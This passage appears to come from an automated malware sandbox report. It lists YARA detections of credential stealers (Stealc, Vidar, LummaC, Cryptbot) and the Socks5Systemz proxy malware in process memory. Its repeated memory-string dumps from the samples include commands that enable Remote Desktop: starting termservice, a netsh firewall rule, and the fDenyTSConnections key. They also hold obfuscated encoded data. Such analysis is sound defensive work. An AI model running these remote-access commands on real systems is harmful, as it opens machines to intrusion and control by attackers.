Source: Yara match	File source: 0000001E.00000003.3007878955.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.3536995866.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3288f0a855.exe PID: 6676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GOLD1234.exe PID: 1848, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match	File source: 0000001F.00000003.3795915109.000000000E2DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795915109.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3384717218.0000000001763000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3795777106.000000000E30E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JavUmar.exe PID: 4712, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3288f0a855.exe PID: 6676, type: MEMORYSTR

Yara detected Socks5Systemz

Source: Yara match	File source: 00000027.00000002.4847975543.0000000002EC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.4844229093.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: blurayplayer32.exe PID: 2824, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 7.2.stealc_default2.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.stealc_default2.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.2682479773.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2682444878.0000000000691000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR

Contains functionality to start a terminal service

Source: Offnewhere.exe, 00000008.00000003.2748312125.0000000005AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Offnewhere.exe, 00000008.00000003.2748312125.0000000005AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Offnewhere.exe, 00000008.00000002.2751675819.0000000000831000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: net start termservice
Source: Offnewhere.exe, 00000008.00000002.2751675819.0000000000831000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Offnewhere.exe, 00000008.00000000.2744433832.0000000000831000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: net start termservice
Source: Offnewhere.exe, 00000008.00000000.2744433832.0000000000831000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 00000009.00000002.4792754218.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000009.00000002.4792754218.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 00000009.00000000.2750649728.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000009.00000000.2750649728.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 0000000A.00000002.2753574445.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
